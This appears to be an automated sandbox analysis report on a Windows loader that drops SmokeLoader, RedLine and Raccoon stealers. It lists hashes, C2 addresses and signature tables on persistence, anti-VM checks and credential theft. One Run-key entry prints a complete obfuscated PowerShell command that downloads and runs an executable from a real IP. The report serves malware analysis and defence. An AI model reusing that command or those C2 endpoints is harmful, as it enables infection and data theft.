Analysis

max time kernel: 151s
max time network: 146s
platform: windows10_x64
resource: win10v20210408
submitted: 12-08-2021 03:56

Static task: static1
Behavioral task: behavioral1
  Sample: 506962077b6d4f41f6879641bc8c8695.exe
  Resource: win7v20210410
Behavioral task: behavioral2
  Sample: 506962077b6d4f41f6879641bc8c8695.exe
  Resource: win10v20210408

General

Target: 506962077b6d4f41f6879641bc8c8695.exe
Size: 319KB
MD5: 506962077b6d4f41f6879641bc8c8695
SHA1: f2071382ba9d6eef51a56ca754247f669602440c
SHA256: 22c622082b1db75bb23f602ff64c49158d9740e63a0441abe52a47e2f961b57b
SHA512: 72cd80071468a9e893c6e434e81a0bf7c3ea4213e91b97ffb640fc5f6ae976b4332e0c27df0e290f8f008222f53d1248817add739f7a928fa8afd77f33ef1496

Malware Config

Extracted: http://91.241.19.52/Api/GetFile2

Extracted: smokeloader 2020

Extracted: redline
  @gasfer_dark
  207.154.240.76:80

Extracted: raccoon
  2ca2376c561d1af7f8b9e6f3256b06220a3db187
  url4cnc: https://telete.in/johnyes13

Extracted: raccoon
  cd8dc1031358b1aec55cc6bc447df1018b068607
  url4cnc: https://telete.in/jagressor_kz

Extracted: raccoon
  471c70de3b4f9e4d493e418d1f60a90659057de0
  url4cnc: https://telete.in/p1rosto100xx

Signatures

Process spawned unexpected child process 6 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
description pid pid_target process target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5056 3964 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5104 3964 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5024 3964 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4112 3964 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4288 3964 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4384 3964 schtasks.exe

Raccoon Stealer Payload 5 IoCs
Processes:
resource yara_rule
behavioral2/memory/996-191-0x0000000004990000-0x0000000004A23000-memory.dmp family_raccoon
behavioral2/memory/996-199-0x0000000000400000-0x0000000002CB1000-memory.dmp family_raccoon
behavioral2/memory/1840-202-0x0000000000A70000-0x0000000000BBA000-memory.dmp family_raccoon
behavioral2/memory/1840-204-0x0000000000400000-0x0000000000946000-memory.dmp family_raccoon
behavioral2/memory/4648-324-0x0000000000400000-0x0000000000495000-memory.dmp family_raccoon

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.

RedLine Payload 4 IoCs
Processes:
resource yara_rule
C:\Users\Admin\AppData\Local\Temp\D6BF.exe family_redline
C:\Users\Admin\AppData\Local\Temp\D6BF.exe family_redline
C:\Users\Admin\AppData\Local\Temp\F151.exe family_redline
C:\Users\Admin\AppData\Local\Temp\F151.exe family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.

Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
Processes:
description pid process target process
PID 3196 created 996 3196 WerFault.exe EEDE.exe

suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs

Blocklisted process makes network request 1 IoCs
Processes:
flow pid process
37 4232 powershell.exe

Downloads MZ/PE file

Executes dropped EXE 62 IoCs
Processes:
pid process
1352 C8A5.exe
3676 C8A5.tmp
4016 C8A5.exe
2160 C8A5.tmp
3048 D6BF.exe
2848 DB64.exe
672 fsucenter.exe
2276 Runtimebroker.exe
424 E4CB.exe
996 EEDE.exe
1840 F008.exe
544 F151.exe
4648 E4CB.exe
4164 Database.exe
4712 Database.exe
4728 install.exe
4804 HostData.exe
4820 Database.exe
4884 Database.exe
5012 Database.exe
5108 Database.exe
4200 Database.exe
1600 Database.exe
2244 Database.exe
4240 Database.exe
4344 Database.exe
4424 Database.exe
4056 Database.exe
2124 Database.exe
3200 Database.exe
3408 Database.exe
4448 Database.exe
4524 Database.exe
4592 Database.exe
3948 Database.exe
4028 Database.exe
4568 Database.exe
4632 Database.exe
3848 Database.exe
1724 Database.exe
4688 Database.exe
3744 Database.exe
2544 Database.exe
4148 Database.exe
4708 Database.exe
4764 Database.exe
1896 Database.exe
4828 install.exe
4872 install.exe
4916 Database.exe
5076 Database.exe
2256 Database.exe
4060 Database.exe
2168 Database.exe
2024 Database.exe
4016 Database.exe
4292 Database.exe
3932 RuntimeBroker.exe
496 Database.exe
3876 Database.exe
640 Database.exe
2172 Database.exe

Checks BIOS information in registry 2 TTPs 64 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
description ioc process
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe

Deletes itself 1 IoCs
Processes:
pid process
2724

Drops startup file 1 IoCs
Processes:
description ioc process
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sound device.lnk Runtimebroker.exe

Loads dropped DLL 6 IoCs
Processes:
pid process
672 fsucenter.exe
1840 F008.exe
1840 F008.exe
1840 F008.exe
1840 F008.exe
1840 F008.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.

Processes:
resource yara_rule
C:\Users\Admin\AppData\Local\Temp\D6BF.exe themida
C:\Users\Admin\AppData\Local\Temp\D6BF.exe themida
behavioral2/memory/3048-142-0x0000000000F20000-0x0000000000F21000-memory.dmp themida

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs

Adds Run key to start application 2 TTPs 7 IoCs
Processes:
description ioc process
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\explorer = "\"C:\\Program Files (x86)\\Google\\Temp\\GUM18A1.tmp\\explorer.exe\"" install.exe
Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\Sound device = "Cmd.Exe /c POwERsheLl -WinD HIDDen -CoMmAN (New-Object System.Net.WebClient).DownloadFile(('http://91.241.19.52/Ru'+'nti'+'m'+'ebr'+'oke'+'r.exe'),($env:TEMP+'\\Vp'+'nm.e'+'xe'));Start-Process ($env:TEMP+'\\V'+'pn'+'m.exe')" powershell.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\explorer = "\"C:\\ProgramData\\WindowsHolographicDevices\\SpatialStore\\explorer.exe\"" install.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE = "\"C:\\Windows\\Prefetch\\ReadyBoot\\WmiPrvSE.exe\"" install.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Windows\\System32\\shellstyle\\RuntimeBroker.exe\"" install.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Windows\\System32\\mfvdsp\\RuntimeBroker.exe\"" install.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\HostData = "\"C:\\ProgramData\\Systemd\\process\\HostData.exe\"" install.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.

Processes:
description ioc process
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA D6BF.exe
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Drops file in System32 directory 4 IoCs
Processes:
description ioc process
File created C:\Windows\SysWOW64\mfvdsp\9e8d7a4ca61bd92aff00cc37a7a4d62a2cac998d install.exe
File created C:\Windows\SysWOW64\shellstyle\RuntimeBroker.exe install.exe
File created C:\Windows\SysWOW64\shellstyle\9e8d7a4ca61bd92aff00cc37a7a4d62a2cac998d install.exe
File created C:\Windows\SysWOW64\mfvdsp\RuntimeBroker.exe install.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 64 IoCs
Processes:
pid process
3048 D6BF.exe
4164 Database.exe
4164 Database.exe
4164 Database.exe
4712 Database.exe
4712 Database.exe
4712 Database.exe
4820 Database.exe
4820 Database.exe
4820 Database.exe
4884 Database.exe
4884 Database.exe
4884 Database.exe
5012 Database.exe
5012 Database.exe
5012 Database.exe
5108 Database.exe
5108 Database.exe
5108 Database.exe
4200 Database.exe
4200 Database.exe
4200 Database.exe
1600 Database.exe
1600 Database.exe
1600 Database.exe
2244 Database.exe
2244 Database.exe
2244 Database.exe
4240 Database.exe
4240 Database.exe
4240 Database.exe
4344 Database.exe
4344 Database.exe
4344 Database.exe
4424 Database.exe
4424 Database.exe
4424 Database.exe
4056 Database.exe
4056 Database.exe
4056 Database.exe
2124 Database.exe
2124 Database.exe
2124 Database.exe
3200 Database.exe
3200 Database.exe
3200 Database.exe
3408 Database.exe
3408 Database.exe
3408 Database.exe
4448 Database.exe
4448 Database.exe
4448 Database.exe
4524 Database.exe
4524 Database.exe
4524 Database.exe
4592 Database.exe
4592 Database.exe
4592 Database.exe
3948 Database.exe
3948 Database.exe
3948 Database.exe
4028 Database.exe
4028 Database.exe
4028 Database.exe

Suspicious use of SetThreadContext 3 IoCs
Processes:
description pid process target process
PID 652 set thread context of 1856 652 506962077b6d4f41f6879641bc8c8695.exe 506962077b6d4f41f6879641bc8c8695.exe
PID 424 set thread context of 4648 424 E4CB.exe E4CB.exe
PID 4728 set thread context of 4872 4728 install.exe install.exe

Drops file in Program Files directory 2 IoCs
Processes:
description ioc process
File created C:\Program Files (x86)\Google\Temp\GUM18A1.tmp\explorer.exe install.exe
File created C:\Program Files (x86)\Google\Temp\GUM18A1.tmp\7a0fd90576e08807bde2cc57bcf9854bbce05fe3 install.exe

Drops file in Windows directory 2 IoCs
Processes:
description ioc process
File created C:\Windows\Prefetch\ReadyBoot\WmiPrvSE.exe install.exe
File created C:\Windows\Prefetch\ReadyBoot\24dbde2999530ef5fd907494bc374d663924116c install.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Program crash 5 IoCs
Processes:
pid pid_target process target process
3864 996 WerFault.exe EEDE.exe
384 996 WerFault.exe EEDE.exe
416 996 WerFault.exe EEDE.exe
2812 996 WerFault.exe EEDE.exe
3196 996 WerFault.exe EEDE.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
description ioc process
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 506962077b6d4f41f6879641bc8c8695.exe
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 506962077b6d4f41f6879641bc8c8695.exe
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 506962077b6d4f41f6879641bc8c8695.exe

Creates scheduled task(s) 1 TTPs 6 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
pid process
4384 schtasks.exe
5056 schtasks.exe
5104 schtasks.exe
5024 schtasks.exe
4112 schtasks.exe
4288 schtasks.exe

Modifies registry class 1 IoCs
Processes:
description ioc process
Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings install.exe

Modifies system certificate store 2 IoCs
Processes:
description ioc process
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 fsucenter.exe
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = [certificate blob omitted] fsucenter.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
pid process
1856 506962077b6d4f41f6879641bc8c8695.exe
1856 506962077b6d4f41f6879641bc8c8695.exe
2724 2724 2724 2724 2724 2724 2724 2724 2724 2724 2724 2724 2724 2724 2724 2724 2724 2724 2724 2724 2724 2724 2724 2724 2724 2724 2724 2724 2724 2724 2724 2724 2724 2724 2724 2724 2724 2724 2724 2724 2724 2724 2724 2724 2724 2724 2724 2724 2724 2724 2724 2724 2724 2724 2724 2724 2724 2724 2724 2724 2724 2724

Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid process
2724

Suspicious behavior: MapViewOfSection 19 IoCs
Processes:
pid process
1856 506962077b6d4f41f6879641bc8c8695.exe
2724 2724 2724 2724 2724 2724 2724 2724 2724 2724 2724 2724 2724 2724 2724 2724 2724 2724

Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
description pid process
Token: SeShutdownPrivilege 2724
Token: SeCreatePagefilePrivilege 2724
Token: SeShutdownPrivilege 2724
Token: SeCreatePagefilePrivilege 2724
Token: SeShutdownPrivilege 2724
Token: SeCreatePagefilePrivilege 2724
Token: SeShutdownPrivilege 2724
Token: SeCreatePagefilePrivilege 2724
Token: SeShutdownPrivilege 2724
Token: SeCreatePagefilePrivilege 2724
Token: SeShutdownPrivilege 2724
Token: SeCreatePagefilePrivilege 2724
Token: SeShutdownPrivilege 2724
Token: SeCreatePagefilePrivilege 2724
Token: SeShutdownPrivilege 2724
Token: SeCreatePagefilePrivilege 2724
Token: SeShutdownPrivilege 2724
Token: SeCreatePagefilePrivilege 2724
Token: SeShutdownPrivilege 2724
Token: SeCreatePagefilePrivilege 2724
Token: SeShutdownPrivilege 2724
Token: SeCreatePagefilePrivilege 2724
Token: SeShutdownPrivilege 2724
Token: SeCreatePagefilePrivilege 2724
Token: SeShutdownPrivilege 2724
Token: SeCreatePagefilePrivilege 2724
Token: SeShutdownPrivilege 2724
Token: SeCreatePagefilePrivilege 2724
Token: SeShutdownPrivilege 2724
Token: SeCreatePagefilePrivilege 2724
Token: SeShutdownPrivilege 2724
Token: SeCreatePagefilePrivilege 2724
Token: SeShutdownPrivilege 2724
Token: SeCreatePagefilePrivilege 2724
Token: SeShutdownPrivilege 2724
Token: SeCreatePagefilePrivilege 2724
Token: SeShutdownPrivilege 2724
Token: SeCreatePagefilePrivilege 2724
Token: SeShutdownPrivilege 2724
Token: SeCreatePagefilePrivilege 2724
Token: SeShutdownPrivilege 2724
Token: SeCreatePagefilePrivilege 2724
Token: SeShutdownPrivilege 2724
Token: SeCreatePagefilePrivilege 2724
Token: SeShutdownPrivilege 2724
Token: SeCreatePagefilePrivilege 2724
Token: SeDebugPrivilege 3048 D6BF.exe
Token: SeShutdownPrivilege 2724
Token: SeCreatePagefilePrivilege 2724
Token: SeShutdownPrivilege 2724
Token: SeCreatePagefilePrivilege 2724
Token: SeShutdownPrivilege 2724
Token: SeCreatePagefilePrivilege 2724
Token: SeDebugPrivilege 508 powershell.exe
Token: SeDebugPrivilege 544 F151.exe
Token: SeRestorePrivilege 3864 WerFault.exe
Token: SeBackupPrivilege 3864 WerFault.exe
Token: SeDebugPrivilege 3864 WerFault.exe
Token: SeDebugPrivilege 384 WerFault.exe
Token: SeDebugPrivilege 416 WerFault.exe
Token: SeDebugPrivilege 2812 explorer.exe
Token: SeDebugPrivilege 3196 WerFault.exe
Token: SeShutdownPrivilege 2724
Token: SeCreatePagefilePrivilege 2724

Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
pid process
2160 C8A5.tmp

Suspicious use of UnmapMainImage 1 IoCs
Processes:
pid process
2724

Suspicious use of WriteProcessMemory 64 IoCs
Processes:
description pid process target process
PID 652 wrote to memory of 1856 652 506962077b6d4f41f6879641bc8c8695.exe 506962077b6d4f41f6879641bc8c8695.exe
PID 652 wrote to memory of 1856 652 506962077b6d4f41f6879641bc8c8695.exe 506962077b6d4f41f6879641bc8c8695.exe
PID 652 wrote to memory of 1856 652 506962077b6d4f41f6879641bc8c8695.exe 506962077b6d4f41f6879641bc8c8695.exe
PID 652 wrote to memory of 1856 652 506962077b6d4f41f6879641bc8c8695.exe 506962077b6d4f41f6879641bc8c8695.exe
PID 652 wrote to memory of 1856 652 506962077b6d4f41f6879641bc8c8695.exe 506962077b6d4f41f6879641bc8c8695.exe
PID 652 wrote to memory of 1856 652 506962077b6d4f41f6879641bc8c8695.exe 506962077b6d4f41f6879641bc8c8695.exe
PID 2724 wrote to memory of 1352 2724 C8A5.exe
PID 2724 wrote to memory of 1352 2724 C8A5.exe
PID 2724 wrote to memory of 1352 2724 C8A5.exe
PID 1352 wrote to memory of 3676 1352 C8A5.exe C8A5.tmp
PID 1352 wrote to memory of 3676 1352 C8A5.exe C8A5.tmp
PID 1352 wrote to memory of 3676 1352 C8A5.exe C8A5.tmp
PID 3676 wrote to memory of 4016 3676 C8A5.tmp C8A5.exe
PID 3676 wrote to memory of 4016 3676 C8A5.tmp C8A5.exe
PID 3676 wrote to memory of 4016 3676 C8A5.tmp C8A5.exe
PID 4016 wrote to memory of 2160 4016 C8A5.exe C8A5.tmp
PID 4016 wrote to memory of 2160 4016 C8A5.exe C8A5.tmp
PID 4016 wrote to memory of 2160 4016 C8A5.exe C8A5.tmp
PID 2724 wrote to memory of 3048 2724 D6BF.exe
PID 2724 wrote to memory of 3048 2724 D6BF.exe
PID 2724 wrote to memory of 3048 2724 D6BF.exe
PID 2724 wrote to memory of 2848 2724 DB64.exe
PID 2724 wrote to memory of 2848 2724 DB64.exe
PID 2724 wrote to memory of 2848 2724 DB64.exe
PID 2160 wrote to memory of 672 2160 explorer.exe fsucenter.exe
PID 2160 wrote to memory of 672 2160 explorer.exe fsucenter.exe
